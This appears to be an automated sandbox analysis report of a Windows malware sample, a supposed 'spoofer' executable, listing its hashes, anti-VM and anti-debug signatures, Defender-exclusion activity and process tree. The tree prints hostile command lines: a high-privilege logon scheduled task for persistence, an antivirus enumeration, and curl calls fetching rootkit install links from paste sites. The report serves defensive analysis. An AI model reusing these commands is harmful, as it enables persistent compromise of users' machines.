Analysis
-
max time kernel
91s -
max time network
99s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
15-06-2024 21:07
Behavioral task
behavioral1
Sample
Bald.Win_New_Temp_Swoofer.exe
Resource
win7-20240508-en
General
-
Target
Bald.Win_New_Temp_Swoofer.exe
-
Size
4.6MB
-
MD5
76761b94d0187562e9acc8feb0d36111
-
SHA1
40d118971e1c9e1e96264b23772ba0ec5e159a0c
-
SHA256
d02f513e1673e5012e916fad43e0672ee0ff9cdfbc0733401b9b8fd4bd88d1f3
-
SHA512
d48731994aae2c6f7b86edf22f843913568ade13e482154b71798c7b37b62e617c0f6960b3c9ba8db5c70d173ff0ef864f9c2467d7db6fb5d617a88a301c1423
-
SSDEEP
98304:L/hllE2G7C2b9cH1UWzfW4Npy2K176ylIqdF8J8mK98wbRNVGllXLTPhCPzH00pE:LxlCcH1BSBvrltsY9jDqXLVaL7u
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
Bald.Win_New_Temp_Swoofer.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Bald.Win_New_Temp_Swoofer.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 3376 powershell.exe 1408 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Bald.Win_New_Temp_Swoofer.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Bald.Win_New_Temp_Swoofer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Bald.Win_New_Temp_Swoofer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
1321192314-1141701036-55274516-1394016520.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation 1321192314-1141701036-55274516-1394016520.exe -
Executes dropped EXE 1 IoCs
Processes:
1321192314-1141701036-55274516-1394016520.exepid process 3440 1321192314-1141701036-55274516-1394016520.exe -
Processes:
resource yara_rule behavioral2/memory/4260-0-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp themida behavioral2/memory/4260-4-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp themida behavioral2/memory/4260-2-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp themida behavioral2/memory/4260-3-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp themida behavioral2/memory/4260-6-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp themida behavioral2/memory/4260-5-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp themida behavioral2/memory/4260-7-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp themida behavioral2/memory/4260-26-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp themida behavioral2/memory/4260-97-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp themida behavioral2/memory/4260-252-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp themida behavioral2/memory/4260-370-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp themida behavioral2/memory/4260-373-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmp themida -
Processes:
Bald.Win_New_Temp_Swoofer.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Bald.Win_New_Temp_Swoofer.exe -
Drops file in System32 directory 1 IoCs
Processes:
Bald.Win_New_Temp_Swoofer.exedescription ioc process File created C:\Windows\System32\WindowsDSEProtectionSoft.dll Bald.Win_New_Temp_Swoofer.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Bald.Win_New_Temp_Swoofer.exepid process 4260 Bald.Win_New_Temp_Swoofer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 16 IoCs
Processes:
Bald.Win_New_Temp_Swoofer.exemsedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519 Bald.Win_New_Temp_Swoofer.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\DefaultIcon Bald.Win_New_Temp_Swoofer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bald.Win_New_Temp_Swoofer.exe" Bald.Win_New_Temp_Swoofer.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 msedge.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children msedge.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\URL Protocol Bald.Win_New_Temp_Swoofer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" msedge.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\ = "URL:Run game 1249325487893905519 protocol" Bald.Win_New_Temp_Swoofer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bald.Win_New_Temp_Swoofer.exe" Bald.Win_New_Temp_Swoofer.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\shell\open\command Bald.Win_New_Temp_Swoofer.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\shell Bald.Win_New_Temp_Swoofer.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\discord-1249325487893905519\shell\open Bald.Win_New_Temp_Swoofer.exe Set value (str) \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" msedge.exe Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe msedge.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
Bald.Win_New_Temp_Swoofer.exeRuntimeBroker.exemsedge.exemsedge.exepowershell.exemsedge.exepowershell.exeidentity_helper.exepid process 4260 Bald.Win_New_Temp_Swoofer.exe 4260 Bald.Win_New_Temp_Swoofer.exe 3900 RuntimeBroker.exe 3900 RuntimeBroker.exe 3900 RuntimeBroker.exe 3900 RuntimeBroker.exe 3132 msedge.exe 3132 msedge.exe 5064 msedge.exe 5064 msedge.exe 3376 powershell.exe 3376 powershell.exe 3376 powershell.exe 3880 msedge.exe 1408 powershell.exe 1408 powershell.exe 1408 powershell.exe 3628 identity_helper.exe 3628 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Bald.Win_New_Temp_Swoofer.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4260 Bald.Win_New_Temp_Swoofer.exe Token: SeIncreaseQuotaPrivilege 868 WMIC.exe Token: SeSecurityPrivilege 868 WMIC.exe Token: SeTakeOwnershipPrivilege 868 WMIC.exe Token: SeLoadDriverPrivilege 868 WMIC.exe Token: SeSystemProfilePrivilege 868 WMIC.exe Token: SeSystemtimePrivilege 868 WMIC.exe Token: SeProfSingleProcessPrivilege 868 WMIC.exe Token: SeIncBasePriorityPrivilege 868 WMIC.exe Token: SeCreatePagefilePrivilege 868 WMIC.exe Token: SeBackupPrivilege 868 WMIC.exe Token: SeRestorePrivilege 868 WMIC.exe Token: SeShutdownPrivilege 868 WMIC.exe Token: SeDebugPrivilege 868 WMIC.exe Token: SeSystemEnvironmentPrivilege 868 WMIC.exe Token: SeRemoteShutdownPrivilege 868 WMIC.exe Token: SeUndockPrivilege 868 WMIC.exe Token: SeManageVolumePrivilege 868 WMIC.exe Token: 33 868 WMIC.exe Token: 34 868 WMIC.exe Token: 35 868 WMIC.exe Token: 36 868 WMIC.exe Token: SeIncreaseQuotaPrivilege 868 WMIC.exe Token: SeSecurityPrivilege 868 WMIC.exe Token: SeTakeOwnershipPrivilege 868 WMIC.exe Token: SeLoadDriverPrivilege 868 WMIC.exe Token: SeSystemProfilePrivilege 868 WMIC.exe Token: SeSystemtimePrivilege 868 WMIC.exe Token: SeProfSingleProcessPrivilege 868 WMIC.exe Token: SeIncBasePriorityPrivilege 868 WMIC.exe Token: SeCreatePagefilePrivilege 868 WMIC.exe Token: SeBackupPrivilege 868 WMIC.exe Token: SeRestorePrivilege 868 WMIC.exe Token: SeShutdownPrivilege 868 WMIC.exe Token: SeDebugPrivilege 868 WMIC.exe Token: SeSystemEnvironmentPrivilege 868 WMIC.exe Token: SeRemoteShutdownPrivilege 868 WMIC.exe Token: SeUndockPrivilege 868 WMIC.exe Token: SeManageVolumePrivilege 868 WMIC.exe Token: 33 868 WMIC.exe Token: 34 868 WMIC.exe Token: 35 868 WMIC.exe Token: 36 868 WMIC.exe Token: SeIncreaseQuotaPrivilege 3320 WMIC.exe Token: SeSecurityPrivilege 3320 WMIC.exe Token: SeTakeOwnershipPrivilege 3320 WMIC.exe Token: SeLoadDriverPrivilege 3320 WMIC.exe Token: SeSystemProfilePrivilege 3320 WMIC.exe Token: SeSystemtimePrivilege 3320 WMIC.exe Token: SeProfSingleProcessPrivilege 3320 WMIC.exe Token: SeIncBasePriorityPrivilege 3320 WMIC.exe Token: SeCreatePagefilePrivilege 3320 WMIC.exe Token: SeBackupPrivilege 3320 WMIC.exe Token: SeRestorePrivilege 3320 WMIC.exe Token: SeShutdownPrivilege 3320 WMIC.exe Token: SeDebugPrivilege 3320 WMIC.exe Token: SeSystemEnvironmentPrivilege 3320 WMIC.exe Token: SeRemoteShutdownPrivilege 3320 WMIC.exe Token: SeUndockPrivilege 3320 WMIC.exe Token: SeManageVolumePrivilege 3320 WMIC.exe Token: 33 3320 WMIC.exe Token: 34 3320 WMIC.exe Token: 35 3320 WMIC.exe Token: 36 3320 WMIC.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
Processes:
msedge.exepid process 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe 5064 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Bald.Win_New_Temp_Swoofer.execmd.execmd.exemsedge.exedescription pid process target process PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 3900 4260 Bald.Win_New_Temp_Swoofer.exe RuntimeBroker.exe PID 4260 wrote to memory of 4220 4260 Bald.Win_New_Temp_Swoofer.exe cmd.exe PID 4260 wrote to memory of 4220 4260 Bald.Win_New_Temp_Swoofer.exe cmd.exe PID 4220 wrote to memory of 432 4220 cmd.exe certutil.exe PID 4220 wrote to memory of 432 4220 cmd.exe certutil.exe PID 4220 wrote to memory of 2124 4220 cmd.exe find.exe PID 4220 wrote to memory of 2124 4220 cmd.exe find.exe PID 4220 wrote to memory of 2400 4220 cmd.exe find.exe PID 4220 wrote to memory of 2400 4220 cmd.exe find.exe PID 4260 wrote to memory of 4800 4260 Bald.Win_New_Temp_Swoofer.exe cmd.exe PID 4260 wrote to memory of 4800 4260 Bald.Win_New_Temp_Swoofer.exe cmd.exe PID 4800 wrote to memory of 5064 4800 cmd.exe msedge.exe PID 4800 wrote to memory of 5064 4800 cmd.exe msedge.exe PID 5064 wrote to memory of 3044 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 3044 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe PID 5064 wrote to memory of 1700 5064 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3900
-
C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe"C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe" MD53⤵PID:432
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵PID:2124
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵PID:2400
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start https://feds.lol/udman2⤵
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://feds.lol/udman3⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb1ae346f8,0x7ffb1ae34708,0x7ffb1ae347184⤵PID:3044
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:24⤵PID:1700
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:3132 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:84⤵PID:4796
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:14⤵PID:1532
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:14⤵PID:4936
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:14⤵PID:1388
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=5312 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:3880 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=5456 /prefetch:84⤵PID:5076
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:14⤵PID:1928
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:14⤵PID:5008
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:84⤵PID:1036
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:3628 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3960 /prefetch:14⤵PID:2724
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,15061591709164076716,3321785011789413496,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:14⤵PID:2776
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exe2⤵PID:1268
-
C:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exeC:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exe3⤵
- Checks computer location settings
- Executes dropped EXE
PID:3440 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName4⤵PID:3652
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName5⤵
- Suspicious use of AdjustPrivilegeToken
PID:868 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc onlogon /tn "av-update.sys" /tr "C:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exe" /rl HIGHEST /f >nul4⤵PID:4264
-
C:\Windows\system32\schtasks.exeschtasks /create /sc onlogon /tn "av-update.sys" /tr "C:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
PID:3900 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/hackeroopsecstubblucky/raw"4⤵PID:5008
-
C:\Windows\system32\curl.execurl -s "https://rentry.co/hackeroopsecstubblucky/raw"5⤵PID:3968
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/rootkitinstalllinklol/raw"4⤵PID:4860
-
C:\Windows\system32\curl.execurl -s "https://rentry.co/rootkitinstalllinklol/raw"5⤵PID:1696
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/rootkituninstalllinklol/raw"4⤵PID:2516
-
C:\Windows\system32\curl.execurl -s "https://rentry.co/rootkituninstalllinklol/raw"5⤵PID:3612
-
